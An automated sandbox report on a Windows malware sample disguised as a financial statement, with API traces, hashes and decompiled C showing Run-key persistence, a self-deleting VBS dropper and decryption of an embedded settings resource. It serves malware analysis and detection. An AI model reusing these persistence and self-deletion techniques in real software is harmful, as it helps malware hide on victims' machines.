                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004081A6
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004081AF
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004081B8
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004081C1
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(fso.DeleteFile(Wscript.ScriptFullName)), ref: 004081CF
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004081DB
                                        • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 004081E5
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004081F1
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 0040820F
                                        • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 0040821C
                                        • exit.KERNELBASE ref: 00408228
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408231
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040823A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??1?$basic_string@$G@2@@0@Hstd@@V?$basic_string@$?c_str@?$basic_string@$V01@V10@$??0?$basic_string@G@1@@$V01@@$??4?$basic_string@$FileY?$basic_string@$V10@0@wcslen$AttributesCopy$?length@?$basic_string@CreateDirectoryExecuteShell_wgetenvexitwcscmp
                                        • String ID: """, 0$6$C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe$CreateObject("WScript.Shell").Run "cmd /c ""$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$WScript.Sleep 1000$\install.vbs$fso.DeleteFile $fso.DeleteFile(Wscript.ScriptFullName)$open
                                        • API String ID: 740851534-1698755560
                                        • Opcode ID: 80ca90505373cb20a372e0dccba6a955caa600ae38e6392ff00b4d7c266a472e
                                        • Instruction ID: 2c5ee03a622c4f430e0af795343514bbf493609e2573cf328c1cc28c00924062
                                        • Opcode Fuzzy Hash: 80ca90505373cb20a372e0dccba6a955caa600ae38e6392ff00b4d7c266a472e
                                        • Instruction Fuzzy Hash: 57C15D7290051DEBCB04AFE0EC49DEE7B3CFF54345B44802AF916A71A0EB789945CB98
                                        Uniqueness
                                        Uniqueness Score: -1.00%
                                        APIs
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00413626
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(\system32,?,WinDir), ref: 0041365D
                                        • _wgetenv.MSVCRT ref: 0041366D
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 00413678
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00413683
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0041368F
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00413698
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004136A1
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004136AA
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(\SysWOW64,?,WinDir), ref: 004136BE
                                        • _wgetenv.MSVCRT ref: 004136CE
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 004136D9
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004136E4
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004136F0
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004136F9
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00413702
                                        • _wgetenv.MSVCRT ref: 00413720
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(00000000), ref: 0041372B
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000208,0041BCB0), ref: 00413741
                                        • GetLongPathNameW.KERNELBASE(00000000), ref: 00413748
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 0041375A
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415A24,?,00000000), ref: 0041376D
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGIABV?$allocator@G@1@@Z.MSVCP60(?,00000000,?,00000000), ref: 00413783
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0041378E
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0041379A
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004137A5
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004137AE
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004137B7
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004137C0
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004137C9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??1?$basic_string@$??0?$basic_string@G@1@@$??4?$basic_string@G@2@@0@Hstd@@V01@V10@0@V?$basic_string@$V01@@_wgetenv$?c_str@?$basic_string@LongNamePath
                                        • String ID: AppData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                        • API String ID: 1999370131-1609423294
                                        • Opcode ID: 734d14ebd294d491d0bf7654c7b9023f6ea533aa70ff64e69f2c683222b563c7
                                        • Instruction ID: 55aa70349295c49f58eee01d6a61984d570a68084dfe302b191afe96af195224
                                        • Opcode Fuzzy Hash: 734d14ebd294d491d0bf7654c7b9023f6ea533aa70ff64e69f2c683222b563c7
                                        • Instruction Fuzzy Hash: 4451FCB280150EEBCB05DF90ED59DEEB778EF54345B208066F912E3090EB746B49CB69
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 68%
                                        			E00407D53(void* __ecx, char _a4, char _a8, char _a12, char _a16) {
                                        				char _v20;
                                        				void* _t13;
                                        				void* _t15;
                                        				char* _t26;
                                        				void* _t27;
                                        				void* _t32;
                                        				void* _t35;
                                        
                                        				_t26 = "\"";
                                        				if(_a4 == 1) {
                                        					_t35 = _t27 - 0x10;
                                        					L0041416A();
                                        					L00414146();
                                        					_t3 =  &_a16; // 0x415a24
                                        					_t13 = E0040B7B9(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\",  *_t3, _t35,  &_v20,  &_v20, _t26, 0x41ba28); // executed
                                        					_t27 = _t35 + 0x38;
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_t26, 1);
                                        				}
                                        				if(_a8 == 1) {
                                        					_t32 = _t27 - 0x10;
                                        					L0041416A();
                                        					L00414146();
                                        					_t7 =  &_a16; // 0x415a24
                                        					_t13 = E0040B7B9(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\",  *_t7, _t32,  &_v20,  &_v20, _t26, 0x41ba28);
                                        					_t27 = _t32 + 0x38;
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_t26, 1);
                                        				}
                                        				if(_a12 == 1) {
                                        					L0041416A();
                                        					L00414146();
                                        					_t15 = E0040B7B9(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", _a16, _t27 - 0x10,  &_v20,  &_v20, _t26, 0x41ba28);
                                        					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_t26, 1);
                                        					return _t15;
                                        				}
                                        				return _t13;
                                        			}

                                        APIs
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,00415628,0041BA28,00415628,00000001,C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe,0041BA28,00415A24,?,00408003), ref: 00407D7A
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe), ref: 00407DA4
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe,0041BA28,00415A24,?,00408003), ref: 00407D84
                                          • Part of subcall function 0040B7B9: RegCreateKeyW.ADVAPI32(?,80000002,80000002), ref: 0040B7C6
                                          • Part of subcall function 0040B7B9: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00415628,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe,0041BA28), ref: 0040B7D5
                                          • Part of subcall function 0040B7B9: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe,0041BA28), ref: 0040B7E3
                                          • Part of subcall function 0040B7B9: RegSetValueExW.KERNELBASE(80000002,00407E26,00000000,?,00000000,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24), ref: 0040B7F6
                                          • Part of subcall function 0040B7B9: RegCloseKey.ADVAPI32(80000002,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe,0041BA28), ref: 0040B801
                                          • Part of subcall function 0040B7B9: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe,0041BA28,00415A24), ref: 0040B810
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,00415628,0041BA28,00415628,00000001,C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe,0041BA28,00415A24), ref: 00407DBE
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe,0041BA28,00415A24), ref: 00407DC8
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe), ref: 00407DE8
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(00000001,00415628,0041BA28,00415628,00000001,C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe,0041BA28,00415A24), ref: 00407E02
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe,0041BA28,00415A24), ref: 00407E0C
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe), ref: 00407E2C
                                        Strings
                                        • C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe, xrefs: 00407D5F
                                        • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00407E17
                                        • $ZA, xrefs: 00407DD0, 00407D8C
                                        • Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 00407D8F, 00407DD3
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: G@std@@U?$char_traits@V?$allocator@$G@2@@0@G@2@@std@@Hstd@@V?$basic_string@$??1?$basic_string@$V10@V10@@$?c_str@?$basic_string@?length@?$basic_string@CloseCreateValue
                                        • String ID: $ZA$C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\
                                        • API String ID: 111787555-2646173673
                                        • Opcode ID: 0cb525aa58568e824a8d200d7c719720f3b78d1802e43ba3bcba88e74aab0662
                                        • Instruction ID: d86c43b3a5ba32eb059a2cdc2ec90b1b4ffa6c8f934f2ed61d0225c93748e370
                                        • Opcode Fuzzy Hash: 0cb525aa58568e824a8d200d7c719720f3b78d1802e43ba3bcba88e74aab0662
                                        • Instruction Fuzzy Hash: EE215A72D00114BBD710BAA69C4AEFB7F2CDF91354F440429F91962182E6BA8994C7E6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                        • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,69D65DF0), ref: 00412A90
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A9A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AA3
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$?length@?$basic_string@V12@$??4?$basic_string@?substr@?$basic_string@V01@V01@@$??0?$basic_string@?find@?$basic_string@D@1@@
                                        • String ID:
                                        • API String ID: 3435050692-0
                                        • Opcode ID: cf897032fafc8a7a18bc323011148a7a1d4392e457d1882d7af56b3e3f1ca591
                                        • Instruction ID: d00c3f8f62f9657134ffe5fc931faad8ab4b4020c85508924df81fb6bcd52547
                                        • Opcode Fuzzy Hash: cf897032fafc8a7a18bc323011148a7a1d4392e457d1882d7af56b3e3f1ca591
                                        • Instruction Fuzzy Hash: F631BB7250050EEBCB04EFA0E959CDE7778EF94745B108066F812E7160EB74AB49CB68
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 79%
                                        			_entry_(void* __ebx, void* __edi, void* __esi) {
                                        				CHAR* _v8;
                                        				intOrPtr* _v24;
                                        				intOrPtr _v28;
                                        				struct _STARTUPINFOA _v96;
                                        				int _v100;
                                        				char** _v104;
                                        				int _v108;
                                        				void _v112;
                                        				char** _v116;
                                        				intOrPtr* _v120;
                                        				intOrPtr _v124;
                                        				intOrPtr* _t24;
                                        				void* _t27;
                                        				intOrPtr _t36;
                                        				signed int _t38;
                                        				int _t40;
                                        				intOrPtr* _t41;
                                        				intOrPtr _t42;
                                        				intOrPtr _t49;
                                        				intOrPtr* _t54;
                                        				intOrPtr _t57;
                                        				intOrPtr _t60;
                                        
                                        				_push(0xffffffff);
                                        				_push(0x416e50);
                                        				_push(0x414130);
                                        				_push( *[fs:0x0]);
                                        				 *[fs:0x0] = _t57;
                                        				_v28 = _t57 - 0x68;
                                        				_v8 = 0;
                                        				__set_app_type(2);
                                        				 *0x41c26c =  *0x41c26c | 0xffffffff;
                                        				 *0x41c270 =  *0x41c270 | 0xffffffff;
                                        				 *(__p__fmode()) =  *0x41c264;
                                        				_t24 = __p__commode();
                                        				_t47 =  *0x41c260;
                                        				 *_t24 =  *0x41c260;
                                        				 *0x41c268 = _adjust_fdiv;
                                        				_t27 = E00404F3A( *_adjust_fdiv);
                                        				_t60 =  *0x41b190; // 0x1
                                        				if(_t60 == 0) {
                                        					__setusermatherr(E0041412C);
                                        					_pop(_t47);
                                        				}
                                        				E0041411A(_t27);
                                        				_push(0x41b0e8);
                                        				_push(0x41b0e4);
                                        				L00414114();
                                        				_v112 =  *0x41c25c;
                                        				__getmainargs( &_v100,  &_v116,  &_v104,  *0x41c258,  &_v112);
                                        				_push(0x41b0e0);
                                        				_push(0x41b000); // executed
                                        				L00414114(); // executed
                                        				_t54 =  *_acmdln;
                                        				_v120 = _t54;
                                        				if( *_t54 != 0x22) {
                                        					while(1) {
                                        						__eflags =  *_t54 - 0x20;
                                        						if(__eflags <= 0) {
                                        							goto L7;
                                        						}
                                        						_t54 = _t54 + 1;
                                        						_v120 = _t54;
                                        					}
                                        				} else {
                                        					do {
                                        						_t54 = _t54 + 1;
                                        						_v120 = _t54;
                                        						_t42 =  *_t54;
                                        					} while (_t42 != 0 && _t42 != 0x22);
                                        					if( *_t54 == 0x22) {
                                        						L6:
                                        						_t54 = _t54 + 1;
                                        						_v120 = _t54;
                                        					}
                                        				}
                                        				L7:
                                        				_t36 =  *_t54;
                                        				if(_t36 != 0 && _t36 <= 0x20) {
                                        					goto L6;
                                        				}
                                        				_v96.dwFlags = 0;
                                        				GetStartupInfoA( &_v96);
                                        				_t68 = _v96.dwFlags & 0x00000001;
                                        				if((_v96.dwFlags & 0x00000001) == 0) {
                                        					_t38 = 0xa;
                                        				} else {
                                        					_t38 = _v96.wShowWindow & 0x0000ffff;
                                        				}
                                        				_t40 = E00408C98(_t47, _t68, GetModuleHandleA(0), 0, _t54, _t38); // executed
                                        				_v108 = _t40;
                                        				exit(_t40);
                                        				_t41 = _v24;
                                        				_t49 =  *((intOrPtr*)( *_t41));
                                        				_v124 = _t49;
                                        				_push(_t41);
                                        				_push(_t49);
                                        				L0041410E();
                                        				return _t41;
                                        			}

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                        • String ID:
                                        • API String ID: 801014965-0
                                        • Opcode ID: b2c8cba3d33740866d2ef724b214b525c3666044ca6997f550807a2c6c4dc531
                                        • Instruction ID: 203440f8f63e4a3495bc52082528d8eb2041b3e21c5ddc4624b2c062dd02aed8
                                        • Opcode Fuzzy Hash: b2c8cba3d33740866d2ef724b214b525c3666044ca6997f550807a2c6c4dc531
                                        • Instruction Fuzzy Hash: 92416DB1D40708EFDB209FA5DC89AEA7FB8EB49710F20412FE95197291D7784880CB58
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 53%
                                        			E00409823(intOrPtr _a4) {
                                        				unsigned int _v8;
                                        				signed char* _v12;
                                        				char _v13;
                                        				void* _v20;
                                        				void* _v24;
                                        				char _v40;
                                        				void* _v56;
                                        				char _v1080;
                                        				void* _t36;
                                        				signed int _t38;
                                        				signed int _t42;
                                        				int _t51;
                                        				signed int _t54;
                                        				signed int _t55;
                                        				signed int _t66;
                                        				signed char* _t76;
                                        				void* _t83;
                                        				void* _t88;
                                        				void* _t89;
                                        
                                        				_v12 = _v12 & 0x00000000;
                                        				_v8 = E00409D02( &_v12);
                                        				_t51 =  *_v12 & 0x000000ff;
                                        				_t36 = malloc(_t51);
                                        				_t76 = _v12;
                                        				_t54 = _t51;
                                        				_t7 = _t76 + 1; // 0x1
                                        				_t88 = _t7;
                                        				_v24 = _t36;
                                        				_t55 = _t54 >> 2;
                                        				memcpy(_t36, _t88, _t55 << 2);
                                        				_t38 = memcpy(_t88 + _t55 + _t55, _t88, _t54 & 0x00000003);
                                        				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z(_t38, _t51,  &_v13);
                                        				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t38);
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				_v8 = _v8 + (_t38 | 0xffffffff) - _t51;
                                        				_t83 = malloc(_v8);
                                        				_t42 = _v12;
                                        				_v20 = _t83;
                                        				_t20 = _t42 + 1; // 0x1
                                        				_t89 = _t51 + _t20;
                                        				_t66 = _v8 >> 2;
                                        				memcpy(_t89 + _t66 + _t66, _t89, memcpy(_t83, _t89, _t66 << 2) & 0x00000003);
                                        				E00402F9B( &_v1080, _v24, _t51);
                                        				E0040309E( &_v1080,  &_v40, _v20, _v8); // executed
                                        				free(_v20);
                                        				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z( &_v40);
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				return _a4;
                                        			}

                                        APIs
                                          • Part of subcall function 00409D02: FindResourceA.KERNEL32(00000000,SETTINGS,0000000A), ref: 00409D10
                                          • Part of subcall function 00409D02: LoadResource.KERNEL32(00000000,00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D1B
                                          • Part of subcall function 00409D02: LockResource.KERNEL32(00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D22
                                          • Part of subcall function 00409D02: SizeofResource.KERNEL32(00000000,00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D2D
                                        • malloc.MSVCRT ref: 00409846
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,00000000), ref: 00409872
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040987E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409887
                                        • malloc.MSVCRT ref: 00409898
                                          • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                          • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                          • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                          • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                        • free.MSVCRT(?,?,?,00000000,00408CAD,00000000), ref: 004098E3
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004098F1
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004098FA
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@Resource$??1?$basic_string@V01@@$D@1@@malloc$??4?$basic_string@?c_str@?$basic_string@FindLoadLockSizeofV01@free
                                        • String ID:
                                        • API String ID: 531887698-0
                                        • Opcode ID: c242165edecd777d466082f244190311df4795ce01b8674b0afa1ef32b865684
                                        • Instruction ID: 644eff2a9cee41870484989b0ac8d3f9873871745537e3c52d27647a0f1bd5cd
